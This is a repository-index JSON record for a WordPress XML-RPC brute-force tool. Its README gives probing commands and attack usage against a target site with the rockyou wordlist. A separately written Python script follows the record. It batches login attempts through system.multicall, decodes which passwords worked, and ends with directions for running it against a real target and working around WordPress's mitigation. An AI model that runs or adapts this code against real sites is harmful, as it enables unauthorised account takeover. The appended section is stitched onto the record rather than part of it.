{"id":14955046,"url":"https://github.com/entr0pie/wp-multi-bruteforce","last_synced_at":"2025-10-26T04:18:59.993Z","repository":{"id":157769692,"uuid":"567052584","full_name":"entr0pie/wp-multi-bruteforce","owner":"entr0pie","description":"Script for bruteforcing multiple Wordpress Users (XMLRPC)","archived":false,"fork":false,"pushed_at":"2023-01-14T04:45:45.000Z","size":239,"stargazers_count":8,"open_issues_count":0,"forks_count":4,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-29T08:33:53.217Z","etag":null,"topics":["brute-force","brute-force-attacks","bruteforce-wordlist","bruteforcing","wordpress","wordpress-api","wordpress-security","wordpress-site","xml","xmlrpc","xmlrpc-bruteforcer"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/entr0pie.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-11-17T00:56:09.000Z","updated_at":"2024-11-30T12:02:04.000Z","dependencies_parsed_at":null,"dependency_job_id":"6743f708-feb3-4477-a8b2-64a82e0b879c","html_url":"https://github.com/entr0pie/wp-multi-bruteforce","commit_stats":{"total_commits":26,"total_committers":2,"mean_commits":13.0,"dds":0.1923076923076923,"last_synced_commit":"c0c9b0c085b294ba3561b54dd3dcadc2788126d9"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bruteforce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bru
teforce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bruteforce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bruteforce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/entr0pie","download_url":"https://codeload.github.com/entr0pie/wp-multi-bruteforce/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":237932056,"owners_count":19389560,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","brute-force-attacks","bruteforce-wordlist","bruteforcing","wordpress","wordpress-api","wordpress-security","wordpress-site","xml","xmlrpc","xmlrpc-bruteforcer"],"created_at":"2024-09-24T13:10:26.506Z","updated_at":"2025-10-24T07:30:41.989Z","avatar_url":"https://github.com/entr0pie.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# WP Multi-User Bruteforce\nPython 3 script for brute-forcing multiple WordPress users with only one request per password.\n\n\u003cimg src=\"xmlrpc.png\" alt=\"basic usage\" width=\"600\"/\u003e\n\n\n## How does it work?\n\n\nThe [HackTricks WordPress Pentesting Guide](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#xml-rpc) notes that, if `xmlrpc.php` is enabled, brute-force and DoS attacks are possible by abusing the `system.*` methods, including trying multiple users with **only one request** through the `system.multicall` function (see 
[here](https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FILyTlmNzv1D9YhHQAJo2%2Fimage.png?alt=media\u0026token=5aa88cc4-baa0-4e54-87c1-2cc31203199d)).\n\n\n## Testing the vulnerability\n\n\nRun this command, replacing `your-blog.com` with your website:\n\n\n```\nYOURBLOG=http://your-blog.com/xmlrpc.php\ncurl -d \"\u003cmethodCall\u003e\u003cmethodName\u003esystem.listMethods\u003c/methodName\u003e\u003cparams\u003e\u003c/params\u003e\u003c/methodCall\u003e\" -X POST $YOURBLOG\n``` \n\nCheck that the response is an XML list of the methods the server exposes, like:\n\n\n```\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cmethodResponse\u003e\n  \u003cparams\u003e\n    \u003cparam\u003e\n      \u003cvalue\u003e\n      \u003carray\u003e\u003cdata\u003e\n  \u003cvalue\u003e\u003cstring\u003esystem.multicall\u003c/string\u003e\u003c/value\u003e\n  \u003cvalue\u003e\u003cstring\u003esystem.listMethods\u003c/string\u003e\u003c/value\u003e\n  \u003cvalue\u003e\u003cstring\u003esystem.getCapabilities\u003c/string\u003e\u003c/value\u003e\n  \u003cvalue\u003e\u003cstring\u003edemo.addTwoNumbers\u003c/string\u003e\u003c/value\u003e\n  [...]\n```\n\n\nIf `system.multicall` is listed, the endpoint is probably vulnerable.\n\n\n## Installation\n\n\n```\npip install requests\ncurl https://raw.githubusercontent.com/entr0pie/xmlrpc-multi-request/main/xmlrpc.py | tee xmlrpc.py \n```\n\n\n## Usage\n\n\n### Using the default wordlist (rockyou.txt)\n\n\n```\npython3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader\n```\n\n\n### Setting a wordlist:\n\n\n```\npython3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt\n```\n\n\n### Start the bruteforce from a specific word inside the wordlist:\n\n\n```\npython3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt --word=super_secure_password\n```\n\n\n### Using the config.json file:\n\n\nBy 
default, xmlrpc.py saves the last session to `config.json`:\n\n\n```\n{\n    \"host\":\"http://your-blog.com/xmlrpc.php\",\n    \"users\":\"['admin', 'editor', 'reader']\",\n    \"wordlist\":\"/usr/share/wordlists/rockyou.txt\",\n    \"word\":\"mcfly\",\n    \"debug\":\"False\"\n}\n```\n\n\nYou can replay that session by running:\n\n\n```\npython3 xmlrpc.py --config config.json\n``` \n\n\n## License\n\n\nThis project is under [GNU GPLv3](LICENSE).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentr0pie%2Fwp-multi-bruteforce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fentr0pie%2Fwp-multi-bruteforce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentr0pie%2Fwp-multi-bruteforce/lists"}
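A worked example of the `system.multicall` trick the README describes, added here as editor's example code and not code from the wp-multi-bruteforce project: it builds one XML-RPC request carrying a `wp.getUsersBlogs` login attempt for every user (choosing `wp.getUsersBlogs` as the authenticating method is this example's decision; the README does not name one), then decodes a multicall reply to see which entries succeeded. The replies are constructed samples, not captures, nothing is sent over the network, and the names `build_multicall`, `parse_multicall_response` and `informative_prefix` are hypothetical. The last function encodes a caveat a tester needs: since WordPress 4.4, once one login inside a multicall fails, every later login in the same request is refused with the same 403 fault, so only the entries up to and including the first failure reflect a real password check.

```python
"""WordPress XML-RPC system.multicall credential check: build and decode.

Editor's added example (not the project's code).  One request carries one
wp.getUsersBlogs(username, password) sub-call per user; the reply is decoded
into per-user success/failure.  Sample replies below are constructed.
"""
import xmlrpc.client

# wp.getUsersBlogs authenticates and returns the caller's blogs, so it needs
# no blog id, which makes it a convenient login probe (example's choice).
LOGIN_METHOD = "wp.getUsersBlogs"


def build_multicall(users, password):
    """Return the XML body of one system.multicall request that tries
    `password` against every name in `users` (one sub-call per user)."""
    calls = [{"methodName": LOGIN_METHOD, "params": [u, password]} for u in users]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall_response(xml_text, users):
    """Decode a system.multicall reply into [(user, succeeded)] in call order.

    By the multicall convention (which WordPress's IXR server follows), each
    successful sub-call comes back as a one-element array holding the method
    result, and each failed sub-call as a struct with faultCode/faultString.
    A top-level fault (e.g. XML-RPC disabled for the whole site) yields None.
    """
    try:
        (results,), _ = xmlrpc.client.loads(xml_text)
    except xmlrpc.client.Fault:
        return None
    if len(results) != len(users):
        raise ValueError("reply has %d entries for %d users" % (len(results), len(users)))
    decoded = []
    for user, entry in zip(users, results):
        failed = isinstance(entry, dict) and "faultCode" in entry
        decoded.append((user, not failed))
    return decoded


def informative_prefix(results):
    """Keep only the entries a WordPress 4.4+ server actually checked.

    Since 4.4 the server sets an auth_failed flag on the first failed login in
    a request and answers every later login with the same 403 fault, so
    entries after the first failure say nothing about those passwords.
    """
    kept = []
    for user, ok in results:
        kept.append((user, ok))
        if not ok:
            break
    return kept


# Constructed sample reply: 'admin' succeeded (wp.getUsersBlogs returned one
# blog struct), 'editor' and 'reader' failed with the usual 403 fault.
SAMPLE_USERS = ["admin", "editor", "reader"]
SAMPLE_REPLY = xmlrpc.client.dumps(
    ([
        [[{"blogid": "1", "blogName": "Example", "isAdmin": True}]],
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        {"faultCode": 403, "faultString": "Incorrect username or password."},
    ],),
    methodresponse=True,
)

# Constructed sample of a site that refuses XML-RPC outright: a single
# top-level fault instead of a multicall result array.
DISABLED_REPLY = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site.")
)


if __name__ == "__main__":
    print(build_multicall(SAMPLE_USERS, "mcfly"))
    decoded = parse_multicall_response(SAMPLE_REPLY, SAMPLE_USERS)
    print("all entries:     ", decoded)
    print("trust on WP 4.4+:", informative_prefix(decoded))
    print("disabled site:   ", parse_multicall_response(DISABLED_REPLY, SAMPLE_USERS))
```

To use it against a real target, POST the body from `build_multicall` with `Content-Type: text/xml` to `/xmlrpc.php` (for example with `requests.post`) and hand the response text to `parse_multicall_response`; a `None` result means the server answered with a top-level fault rather than a multicall array. On a current WordPress the amplification is largely gone: put the user you most care about first in each request, or fall back to one login per request, because anything after the first failed entry is noise.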